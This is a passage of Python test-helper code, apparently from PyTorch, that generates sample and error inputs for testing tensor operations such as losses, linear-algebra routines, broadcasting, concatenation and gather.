broadcasts_input=broadcasts_input)) if dtype.is_complex: shapes = [(S, S, S), (S, M, S), (S, S, M)] args = (make_tensor(shapes[0], dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor(shapes[1], dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor(shapes[2], dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)) sample_inputs.append( SampleInput( args[0].transpose_(-1, 1), args=(args[1].transpose(-1, 1).conj().requires_grad_(requires_grad), args[2].transpose(-1, 1).conj().requires_grad_(requires_grad)), kwargs=dict(beta=beta * (1 + 2j), alpha=alpha * (2 + 3j)),)) return tuple(sample_inputs) # TODO: add reduction kwargs def sample_inputs_multilabel_soft_margin_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shapes = ( (S,), (S, S), ) for shape in shapes: # Produce one with weight and one without. yield SampleInput(_make_tensor(shape), args=(_make_tensor(shape, requires_grad=False),), kwargs={}) yield SampleInput(_make_tensor(shape), args=(_make_tensor(shape, requires_grad=False),), kwargs={'weight': _make_tensor(shape, requires_grad=False)}) def sample_inputs_addr(op_info, device, dtype, requires_grad, **kwargs): yield SampleInput( make_tensor((S, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad))) yield SampleInput( make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)), broadcasts_input=True) if dtype.is_complex: alpha, beta = 0.1 + 0.3j, 0.4 + 0.6j elif dtype.is_floating_point: alpha, beta = 0.2, 0.6 else: alpha, beta = 2, 3 yield SampleInput( make_tensor((S, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)), kwargs=dict(beta=beta, alpha=alpha)) yield SampleInput( make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)), kwargs=dict(beta=beta, alpha=alpha), broadcasts_input=True) # These samples fail gradcheck if dtype.is_floating_point and not requires_grad: yield SampleInput( torch.tensor([[math.nan]], device=device, requires_grad=requires_grad), args=( torch.tensor([0.0], device=device, requires_grad=requires_grad), torch.tensor([0.0], device=device, requires_grad=requires_grad), ), kwargs=dict(beta=0.0, alpha=0.0), broadcasts_input=True) yield SampleInput( torch.tensor([[0.0]], device=device, requires_grad=requires_grad), args=( torch.tensor([math.nan], device=device, requires_grad=requires_grad), torch.tensor([math.nan], device=device, requires_grad=requires_grad), ), kwargs=dict(beta=0.0, alpha=0.0), broadcasts_input=True) def sample_inputs_zero_(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ((), (S, S, S), (S,)) for shape in cases: yield(SampleInput(make_arg(shape))) # TODO: add reduction kwargs def sample_inputs_multi_margin_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) make_target = partial(_make_tensor, dtype=torch.long, requires_grad=False) inputs = ( ((), make_target([], low=0, high=1), {}), ((S,), make_target([], low=0, high=S), {"p": 1}), ((S,), make_target([1], low=0, high=S), {"p": 2}), ((S, M), make_target([S], low=0, high=M), {"margin": 1.0}), ((M, S), make_target([M], low=0, high=S), {"weight": None}), ) for input_shape, target, kwargs in inputs: yield SampleInput(_make_tensor(input_shape), args=(target,), kwargs=kwargs) def sample_inputs_logsumexp(self, device, dtype, requires_grad, **kwargs): inputs = ( ((), (0,), True), ((S, S), (1,), True), ((S, S), (1,), False), ((S, S), (-2,), False), ) samples = [] # Test large inputs to check numerical stability lows = (None, 1e3, 1e6) if dtype in (torch.float32, torch.float64) else (None,) for low in lows: high = low * 2 if low is not None else None for shape, dim, keepdim in inputs: t = make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) samples.append(SampleInput(t, args=(dim, keepdim))) return tuple(samples) def sample_inputs_like_fns(self, device, dtype, requires_grad, **kwargs): inputs = [ ((), {}), ((S, S), {}), ((0, S, 0), {}), ((S,), {'dtype': dtype, 'device': device}), # Hard-code some dtypes/devices. We want to test cases where the # (dtype, device) is different from the input's (dtype, device) ((S,), {'dtype': torch.double}), ((S,), {'device': 'cpu'}), ((S,), {'dtype': torch.double, 'device': 'cpu'}), ] if torch.cuda.is_available(): inputs.append(((S,), {'device': 'cuda'})) samples = [] for shape, kwargs in inputs: t = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(t, kwargs=kwargs)) return tuple(samples) def reference_inputs_like_fns(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_like_fns(op, device, dtype, requires_grad, **kwargs) # shape cases = ( (), (0,), (1, 0), (1, 1, 4, 5), (5, 3, 0, 1), (1, 4, 3, 1, 1) ) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape in cases: yield SampleInput(make_arg(shape)) yield SampleInput(make_arg(shape).transpose(0, -1)) yield SampleInput(make_arg(shape, noncontiguous=True)) yield SampleInput(make_arg(shape, noncontiguous=True).transpose(0, -1)) # TODO: add reduction kwargs def sample_inputs_multilabel_margin_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) make_target = partial(_make_tensor, dtype=torch.long, requires_grad=False) inputs = ( ([], make_target([], low=0, high=1)), ([S], make_target([S], low=0, high=S)), ([M, S], make_target([M, S], low=0, high=S)), ) for shape, target in inputs: yield SampleInput(_make_tensor(shape), args=(target,)) def get_independent_tensor(tensor): return tensor.clone().requires_grad_(tensor.requires_grad) def sample_inputs_randint_like(self, device, dtype, requires_grad, **kwargs): samples = [] low = 2 high = 10 for sample in sample_inputs_like_fns(self, device, dtype, requires_grad, **kwargs): # With high samples.append(SampleInput( sample.input, args=(high,) + sample.args, kwargs=sample.kwargs)) # With low and high samples.append(SampleInput( get_independent_tensor(sample.input), args=(low, high,) + sample.args, kwargs=sample.kwargs)) return tuple(samples) def sample_inputs_margin_ranking_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shapes = ( (), (S,), (S, S), (S, S, S), ) margins = (0., 1.) reductions = ('sum', 'mean', 'none') for shape in shapes: for margin, reduction in product(margins, reductions): kwargs = {'margin': margin, 'reduction': reduction} yield SampleInput(_make_tensor(shape), args=(_make_tensor(shape, requires_grad=False), _make_tensor(shape, requires_grad=False)), kwargs=kwargs) def reference_inputs_margin_ranking_loss(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_margin_ranking_loss(op, device, dtype, requires_grad, **kwargs) make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) for reduction in ('sum', 'mean', 'none'): if dtype.is_floating_point: # only supports ints and floats # NaN propagation inp1 = make_input((10, )) inp1[2] = float('nan') inp2 = make_input((10, )) inp2[4] = float('nan') target = make_input((10, )) inp2[9] = float('nan') yield SampleInput(inp1, args=(inp2, target), kwargs={'reduction': reduction}) # Inf handling inp1 = make_input((10, )) inp2[1] = float('inf') inp2 = make_input((10, )) inp2[4] = float('inf') target = make_input((10, )) inp2[7] = float('inf') yield SampleInput(inp1, args=(inp2, target), kwargs={'reduction': reduction}) # Broadcasting inp1 = make_input((5, 2)) inp2 = make_input((5, 1)) target = make_input((1, 2)) yield SampleInput(inp1, args=(inp2, target), kwargs={'reduction': reduction}) def error_inputs_margin_ranking_loss(op, device, **kwargs): make_input = partial(make_tensor, device=device, dtype=torch.float32) # invalid reduction value. yield ErrorInput(SampleInput(make_input(5, 4), args=(make_input(5, 4), make_input(5, 4),), kwargs={'reduction': 'abc'}), error_type=ValueError, error_regex='is not a valid value') # invalid input shapes yield ErrorInput(SampleInput(make_input(5, 4), args=(make_input(5, 4), make_input(5,),)), error_regex='margin_ranking_loss : All input tensors should') def sample_inputs_new_fns(self, device, dtype, requires_grad, **kwargs): inputs = [ ((), (), {}), ((S, S), (2, 0), {}), ((0, S, 0), (3, 2, 2), {}), ((S,), (2, 3), {'dtype': dtype, 'device': device}), # Hard-code some dtypes/devices. We want to test cases where the # (dtype, device) is different from the input's (dtype, device) ((S,), (10,), {'dtype': torch.double}), ((S,), (1, 1, 12), {'device': 'cpu'}), ((S,), (2, 2, 2), {'dtype': torch.double, 'device': 'cpu'}), ] if torch.cuda.is_available(): inputs.append(((S,), (7, 2), {'device': 'cuda'})) samples = [] for input_shape, output_shape, kwargs in inputs: t = make_tensor(input_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(t, args=(output_shape,), kwargs=kwargs)) return tuple(samples) def sample_inputs_empty(op, device, dtype, requires_grad, **kwargs): # shape cases = ( (), (0,), (1,), (1, 3, 5), (5, 3, 1), (1, 0, 5, 1), ) for case in cases: _kwargs = {'device': device, 'dtype': dtype, 'requires_grad': requires_grad} yield SampleInput(case, args=(), kwargs=_kwargs) def sample_inputs_new_full(self, device, dtype, requires_grad, **kwargs): def get_val(dtype): return make_tensor([], dtype=dtype, device="cpu").item() samples = [] for sample in sample_inputs_new_fns(self, device, dtype, requires_grad, **kwargs): # The scalar we are passing to new_full must be the same dtype # as the one of the resulting tensor use_dtype = sample.kwargs['dtype'] if 'dtype' in sample.kwargs else dtype samples.append(SampleInput( sample.input, args=sample.args + (get_val(use_dtype),), kwargs=sample.kwargs)) return tuple(samples) def sample_inputs_full_like(self, device, dtype, requires_grad, **kwargs): def get_val(dtype): return make_tensor([], dtype=dtype, device="cpu").item() inputs = [ ((), get_val(dtype), {}), ((S, S), get_val(dtype), {}), ((0, S, 0), get_val(dtype), {}), ((S,), get_val(dtype), {'dtype': dtype, 'device': device}), # Hard-code some dtypes/devices. We want to test cases where the # (dtype, device) is different from the input's (dtype, device) ((S,), get_val(torch.double), {'dtype': torch.double}), ((S,), get_val(dtype), {'device': 'cpu'}), ((S,), get_val(torch.double), {'dtype': torch.double, 'device': 'cpu'}), ] if torch.cuda.is_available(): inputs.append(((S,), get_val(dtype), {'device': 'cuda'})) samples = [] for shape, fill_value, kwargs in inputs: t = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(t, args=(fill_value,), kwargs=kwargs)) return tuple(samples) def sample_inputs_multinomial(self, device, dtype, requires_grad, **kwargs): cases = [ ([3], 3, dict()), ([10], 3, dict()), ([3, 10], 3, dict()), ([3], 3, dict(replacement=False)), ([3], 3, dict(replacement=True)), ([3, 4], 4, dict(replacement=True)), ([3, 4], 4, dict(replacement=False)), ] samples = [] for shape, num_samples, kwargs in cases: t = make_tensor(shape, dtype=dtype, device=device, low=0, high=None, requires_grad=requires_grad) samples.append(SampleInput(t, args=(num_samples,), kwargs=kwargs)) return tuple(samples) def sample_inputs_normal_common(self, device, dtype, requires_grad, cases, **kwargs): def get_value_or_make_tensor(value_or_shape): if isinstance(value_or_shape, list): return make_tensor(value_or_shape, dtype=dtype, device=device, low=0, high=None, requires_grad=requires_grad) return value_or_shape samples = [] for value_or_mean_shape, value_or_std_shape, kwargs in cases: mean = get_value_or_make_tensor(value_or_mean_shape) std = get_value_or_make_tensor(value_or_std_shape) samples.append(SampleInput(mean, args=(std,), kwargs=kwargs)) return tuple(samples) def sample_inputs_normal_tensor_first(self, device, dtype, requires_grad, **kwargs): # value_or_size, value_or_size, kwargs cases = [ ([], [], {}), ([3], [3], {}), ([3, 4, 2], [3, 4, 2], {}), ([2, 3], 1.1, {}), ([1, 2, 3], [5, 2, 3], {}), # broadcasting ] return sample_inputs_normal_common(self, device, dtype, requires_grad, cases, **kwargs) def sample_inputs_normal_tensor_second(self, device, dtype, requires_grad, **kwargs): cases = [ ([3, 4], 0.3, {}), ] return sample_inputs_normal_common(self, device, dtype, requires_grad, cases, **kwargs) def sample_inputs_bernoulli(self, device, dtype, requires_grad, **kwargs): shapes = [ [3], [], [0, 3], [2, 3, 4], ] samples = [] for shape in shapes: t = make_tensor(shape, dtype=dtype, device=device, low=0, high=1, requires_grad=requires_grad) samples.append(SampleInput(t)) return tuple(samples) def sample_inputs_logcumsumexp(self, device, dtype, requires_grad, **kwargs): inputs = ( ((S, S, S), 0), ((S, S, S), 1), ((), 0), ) samples = [] for large_number in (True, False): for shape, dim in inputs: t = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) if large_number and t.dim() > 0: t[0] = 10000 samples.append(SampleInput(t, args=(dim,))) return tuple(samples) def sample_inputs_trace(self, device, dtype, requires_grad, **kwargs): return (SampleInput((make_tensor((S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad))),) def sample_inputs_renorm(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((S, S, S), (2, 1, 0.5)), ((S, S, S), (2, -1, 0.5)), ((S, S, S), (1, 2, 3)), ((S, S, S), (float('inf'), 2, 0.5)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_transpose_swapdims(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((1, 2, 3), (-1, -2)), ((1, 2, 3), (-1, 2)), ((1, 2, 3), (1, -2)), ((1, 2, 3), (1, 2)), ((), (0, 0)), ((1, ), (0, 0)), ((M, M), (0, 1)), ((S, S, S), (2, 0)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def _numpy_ref_transpose(a, dim0, dim1): if a.ndim <= 1: return a return np.swapaxes(a, dim0, dim1) def sample_inputs_adjoint(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) shapes = ((1, 2, 3), (), (M, M), (S, S, S), (S, M, S), (M, S, M, S)) return (SampleInput(make_arg(shape)) for shape in shapes) def sample_inputs_T(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) shapes = ((), (M, M)) return (SampleInput(make_arg(shape)) for shape in shapes) def sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates invertible inputs for linear algebra ops The input is generated as the itertools.product of 'batches' and 'ns'. In total this function generates 8 SampleInputs 'batches' cases include: () - single input, (0,) - zero batched dimension, (2,) - batch of two matrices, (1, 1) - 1x1 batch of matrices 'ns' gives 0x0 and 5x5 matrices. Zeros in dimensions are edge cases in the implementation and important to test for in order to avoid unexpected crashes. """ make_fn = make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_fn, dtype=dtype, device=device, requires_grad=requires_grad) batches = [(), (0, ), (2, ), (1, 1)] ns = [5, 0] for batch, n in product(batches, ns): yield SampleInput(make_arg(*batch, n, n)) def sample_inputs_linalg_pinv_singular(op_info, device, dtype, requires_grad=False, **kwargs): """ This function produces factors `a` and `b` to generate inputs of the form `a @ b.t()` to test the backward method of `linalg_pinv`. That way we always preserve the rank of the input no matter the perturbations applied to it by the gradcheck. Note that `pinv` is Frechet-differentiable in a rank-preserving neighborhood. """ batches = [(), (0, ), (2, ), (1, 1)] # the size of at least 30 is required to cause failures for the previous implicit implementation # of the pinv's backward method, albeit it is slow. size = [0, 3, 50] for batch, m, n in product(batches, size, size): for k in range(min(3, min(m, n))): # Note that by making the columns of `a` and `b` orthonormal we make sure that # the product matrix `a @ b.t()` has condition number 1 when restricted to its image a = torch.rand(*batch, m, k, device=device, dtype=dtype).qr().Q.requires_grad_(requires_grad) b = torch.rand(*batch, n, k, device=device, dtype=dtype).qr().Q.requires_grad_(requires_grad) yield SampleInput(a, args=(b,)) def sample_inputs_singular_matrix_factors(op_info, device, dtype, requires_grad=False, **kwargs): """ This function produces two tensors of shape (*, m, k) and (*, n, k) with k <= min(m, n). Their matrix product could be used to generate tensor of shape (*, m, n) of rank k. """ batches = [(), (0, ), (2, ), (1, 1)] size = [1, 5, 10] for batch, m, n in product(batches, size, size): for k in range(min(3, min(m, n))): a = make_tensor((*batch, m, k), dtype=dtype, device=device, requires_grad=requires_grad) b = make_tensor((*batch, n, k), dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(a, args=(b,), kwargs=kwargs) def clone_sample(sample, **kwargs): """ Given a SampleInput, this function analyzes its input, args and kwargs, and produces a copy with each non-Tensor entry being copied by reference, and with each Tensor entry cloned with `t.clone().requires_grad_(t.requires_grad)` """ def clone_tensor(t): if isinstance(t, torch.Tensor): return t.detach().clone().requires_grad_(t.requires_grad) else: return t sample_kwargs = kwargs if kwargs else sample.kwargs return SampleInput( clone_tensor(sample.input), args=tuple(map(clone_tensor, sample.args)), kwargs=dict(((k, clone_tensor(v)) for k, v in sample_kwargs.items())) ) def sample_inputs_svd_lowrank(op_info, device, dtype, requires_grad=False, **kwargs): for sample in sample_inputs_singular_matrix_factors(op_info, device, dtype, requires_grad, **kwargs): *batch, m, k = sample.input.shape *_, n, _ = sample.args[0].shape # NOTE: since svd_lowrank relies on non rank-revealing SVD, # it inherits the problem of unstable behavior with repeated # singular values including zeros. # Since we want to avoid (repeated) zeros as singular values, # we can only use k for q. # This issues could be resolved with using a rank-revealing SVD # which does not include "zero" singular values. op_kwargs = { 'q': k, 'M': None } # without M specified yield clone_sample(sample, **op_kwargs) # now with M # TODO: fix bug in the documentation for svd_lowrank: # M has to be (*, m, n), and not (*, 1, n) as written # in the documentation op_kwargs['M'] = make_tensor((*batch, m, n), dtype=dtype, device=device, requires_grad=requires_grad) yield clone_sample(sample, **op_kwargs) def chunk_iter(iterable, size): it = iter(iterable) while True: chunk = tuple(islice(it, size)) if not chunk: break yield chunk def sample_inputs_pca_lowrank(op_info, device, dtype, requires_grad=False, **kwargs): # we reuse samples from svd_lowrank which come in group of two with # kwarg['M'] = None and with kwarg['M'] = <some tensor> samples = sample_inputs_svd_lowrank(op_info, device, dtype, requires_grad, **kwargs) for s1, s2 in chunk_iter(samples, 2): del s1.kwargs['M'] del s2.kwargs['M'] s1.kwargs['center'] = False s2.kwargs['center'] = True yield s1 yield s2 def sample_inputs_linalg_cond(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) # autograd is not supported for inputs with zero number of elements shapes = ((S, S), (2, S, S), (2, 1, S, S), ) for shape in shapes: yield SampleInput(make_arg(shape)) def sample_inputs_linalg_vander(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) shapes = ((), (1,), (S,), (2, S),) for shape in shapes: if len(shape) > 0 and shape[-1] > 1: yield SampleInput(make_arg(shape)) n = shape[-1] if len(shape) > 0 else 1 for i in range(3): # n-1, n, n+1 N = n + i - 1 if N < 2: continue yield SampleInput(make_arg(shape), kwargs=dict(N=N)) def np_vander_batched(x, N=None): # Wrapper around np.vander that supports batches of 1 dimension (enough for the tests) if x.ndim == 0: x = x[np.newaxis] if x.ndim == 1: y = np.vander(x, N=N, increasing=True) return y else: if N is None: N = x.shape[-1] y = np.vander(x.ravel(), N=N, increasing=True).reshape((*x.shape, N)) return y def np_sinc_with_fp16_as_fp32(x): # Wraps numpy's sinc function so that fp16 values are promoted to fp32 # before sinc is invoked. Context: numpy's sinc returns NaN when evaluated # at 0 for fp16. if x.dtype == np.float16: return np.sinc(x.astype(np.float32)) else: return np.sinc(x) def sample_inputs_broadcast_to(op_info, device, dtype, requires_grad, **kwargs): test_cases = ( ((S, 1, 1), (S, S, S)), ((S, 1, S), (S, S, S)), ((S, 1), (S, S, S)), ((1,), (S, S, S)), ((1, S), (1, 1, S)), ((), ()), ((), (1, 3, 2)), ) return tuple( SampleInput( make_tensor(size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(shape,)) for size, shape in test_cases) def sample_inputs_broadcast_tensors(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) test_cases: Tuple[tuple] = (((3,), (1, 2, 1), (1, 1), (5, 1, 1),),) samples: List[SampleInput] = [] for shape, *other_shapes in test_cases: samples.append(SampleInput(make_arg(shape), args=tuple(make_arg(s) for s in other_shapes))) return samples def reference_inputs_broadcast_tensors(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_broadcast_tensors(op, device, dtype, requires_grad, **kwargs) m = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) n = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad, noncontiguous=True) cases = ( ((), (1, 1), (1, 1, 7, 1), (3, 1, 1)), ((3, 5, 6), (1, 3, 5, 6), (1, 1, 1, 1, 6), (8, 3, 5, 6)) ) for a, b, c, d in cases: yield SampleInput(m(a), args=(m(b), m(c), m(d))) yield SampleInput(n(a), args=(n(b), n(c), n(d))) def sample_inputs_block_diag(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) test_cases: Tuple[tuple] = ( ((1, S), (2, S), (3, S),), ((S, 1), (S, 2), (S, 3),), ((1,), (2,), (3,),), ((2, S), (S,)) ) samples: List[SampleInput] = [] for shape, *other_shapes in test_cases: samples.append(SampleInput(make_arg(shape), args=tuple(make_arg(s) for s in other_shapes))) # We also want to test mixed complex-non-complex inputs to block_diag if dtype == torch.complex32 or dtype == torch.complex64: non_complex_dtype = torch.float32 if dtype == torch.complex32 else torch.float64 make_arg_non_complex = partial(make_tensor, dtype=non_complex_dtype, device=device, requires_grad=requires_grad) samples.append(SampleInput(make_arg_non_complex(shape), args=tuple(make_arg(s) for s in other_shapes))) return samples def sample_inputs_cdist(op_info, device, dtype, requires_grad, **kwargs): small_S = 2 test_cases = ( ((S, S, 2), (S, S + 1, 2)), ((S, S), (S, S)), ((S, S, S), (S, S, S)), ((3, 5), (3, 5)), ((2, 3, 5), (2, 3, 5)), ((1, 2, 3), (1, 2, 3)), ((1, 1), (S, 1)), ((0, 5), (4, 5)), ((4, 5), (0, 5)), ((0, 4, 5), (3, 5)), ((4, 5), (0, 3, 5)), ((0, 4, 5), (1, 3, 5)), ((1, 4, 5), (0, 3, 5)), # Using S here would make this one test take 9s ((small_S, small_S, small_S + 1, 2), (small_S, small_S, small_S + 2, 2)), ((small_S, 1, 1, small_S), (1, small_S, small_S)), ((1, 1, small_S), (small_S, 1, small_S, small_S)), ) samples = [] for cm in ['use_mm_for_euclid_dist', 'donot_use_mm_for_euclid_dist']: # FIXME add an override for JIT and revert 0. back to 0 # since it's accepted by eager for p in [0., 1., 2., 3., 0.5, 1.5, 2.5, float("inf")]: for t1_size, t2_size in test_cases: # The args should never be non-contiguous as this is not supported in the backward samples.append(SampleInput( make_tensor(t1_size, dtype=dtype, device=device, requires_grad=requires_grad), args=(make_tensor(t2_size, dtype=dtype, device=device, requires_grad=requires_grad), p, cm))) return samples def sample_inputs_fill_(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, low=None, high=None, requires_grad=requires_grad) cases = (((S, S, S), (1,)), ((), (1,)), ((S, S, S), (make_arg(()),))) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def _fill_np(a, value): a = a.copy() a.fill(value) return a def _fill_aten(a, value): t = a * False with torch.no_grad(): t.fill_(value) return t def _fill_sample_kwargs(device, dtype, input): if dtype is torch.bool: value = True else: value = 3 return ({'value': value}, {'value': value}) def sample_inputs_comparison_ops(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs) # Adds a sample input where both tensors have the same values make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) lhs = make_arg((S, S)) yield SampleInput(lhs, args=(lhs.clone(),)) def sample_inputs_stack(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # shape x number of tensors cases = ( ((3, 4), 1), ((1, 2, 1, 4), 3), ((0, 1, 0), 2),) for shape, num_tensors in cases: tensors = [] for _ in range(num_tensors): tensors.append(make_arg(shape)) for dim in range(-1, len(shape) - 1): yield SampleInput(tensors, args=(dim,)) def sample_inputs_cat_concat(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases: Tuple[tuple, tuple, dict] = ( # type: ignore[assignment] ((S, S), (S, S), {'dim': -1}), ((S, S), (S, S), {'dim': 1}), ((M, S), (S, S), {'dim': 0}), # different shapes ((1, 2, 3), (1, 2, 3), {'dim': -2}), ((0,), (0,), {'dim': 0}), # empty tensor ((0, S), (S, S), {'dim': 0}), ((1,), (1,), {}) # dim not passed, fallback to default ) for input_shape1, input_shape2, kwargs in cases: yield SampleInput([make_arg(input_shape1), make_arg(input_shape2)], kwargs=kwargs) def reference_inputs_cat(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_cat_concat(op, device, dtype, requires_grad, **kwargs) make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Noncontiguous type promoting tensors a = make_arg((3, 4, 2)) b = make_arg((3, 2, 2), noncontiguous=True, dtype=torch.double) c = make_arg((3, 3, 2), dtype=torch.float16).permute(1, 0, 2) yield SampleInput((a, b, c), kwargs={'dim': 1}) # Special 1D tensor with dim length of 0 case a = make_arg((0,)) b = make_arg((3, 2, 2)) yield SampleInput((a, b, a)) yield SampleInput((a, a, a)) def _elementwise_type_promo_np(*args, type_promotion_kind): def _maybe_torch(x): if isinstance(x, np.ndarray): return torch.from_numpy(x) return x flattened = tree_flatten(args)[0] transformed = tuple(_maybe_torch(a) for a in flattened) result_dtype, _ = prims.utils.elementwise_dtypes( *transformed, type_promotion_kind=type_promotion_kind) return torch_to_numpy_dtype_dict[result_dtype] def _cat_np(input_seq, dim=0): inputs = tuple(a for a in input_seq if not (a.ndim == 1 and a.size == 0)) if len(inputs) == 0: np_dtype = _elementwise_type_promo_np( input_seq, type_promotion_kind=prims.utils.ELEMENTWISE_TYPE_PROMOTION_KIND.NO_OPMATH) return np.empty(0, dtype=np_dtype) return np.concatenate(inputs, axis=dim) def _floor_divide_np(a, b): dtype = _elementwise_type_promo_np( a, b, type_promotion_kind=prims.utils.ELEMENTWISE_TYPE_PROMOTION_KIND.DEFAULT) if isinstance(a, np.ndarray): a = a.astype(dtype) if isinstance(b, np.ndarray): b = b.astype(dtype) return np.floor_divide(a, b) def sample_inputs_hstack_dstack_vstack(op_info, device, dtype, requires_grad, **kwargs): tensors = [ make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), ] return (SampleInput(tensors),) def sample_inputs_gather(op_info, device, dtype, requires_grad, **kwargs): return ( SampleInput( make_tensor((M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(0, gather_variable((S, S), 1, M, True, device=device))), SampleInput( make_tensor((M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(1, gather_variable((M, S // 2), 0, S, True, device=device))), SampleInput( make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(0, torch.tensor([0], dtype=torch.int64, device=device))), # Empty index tensor case, see: https://github.com/pytorch/pytorch/pull/65006 SampleInput( make_tensor((S,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(0, torch.tensor([], dtype=torch.uint8, device=device))), SampleInput( make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(0, torch.tensor(0, dtype=torch.int64, device=device))), ) def _fill_indices(idx, dim, dim_size, elems_per_row, m, n, o): for i in range(1 if dim == 0 else m): for j in range(1 if dim == 1 else n): for k in range(1 if dim == 2 else o): ii = [i, j, k] ii[dim] = slice(0, idx.size(dim) + 1) idx[tuple(ii)] = torch.randperm(dim_size)[0:elems_per_row] def error_inputs_gather(op_info, device, **kwargs): # src is [1, 2] # [3, 4] src = torch.tensor(((1, 2), (3, 4)), device=device, dtype=torch.float32) # idx is [0, 0] # [1, 0] idx = torch.tensor(((0, 0), (1, 0)), device=device, dtype=torch.long) # Index should be smaller than self except on dimesion 1 bad_src = make_tensor((1, 1), device=device, dtype=torch.float32) yield ErrorInput(SampleInput(bad_src, args=(1, idx,)), error_regex="Size does not match at dimension 0") # Index must have long dtype bad_idx = idx.to(torch.int32) yield ErrorInput(SampleInput(src, args=(1, bad_idx)), error_regex="Expected dtype int64 for index") # TODO: FIXME # out.dtype must match src.dtype # Creates new src & idx since SampleInputs can't share tensors src = torch.tensor(((1, 2), (3, 4)), device=device, dtype=torch.float32) idx = torch.tensor(((0, 0), (1, 0)), device=device, dtype=torch.long) out = torch.empty((2, 2), device=device, dtype=torch.float64) yield ErrorInput(SampleInput(src, args=(1, idx), kwargs={'out': out}), error_regex="Expected out tensor to have dtype") # src and index tensors must have the same # of dimensions # idx too few dimensions src = torch.tensor(((1, 2), (3, 4)), device=device, dtype=torch.float32) idx = torch.tensor((0, 0), device=device, dtype=torch.long) yield ErrorInput(SampleInput(src, 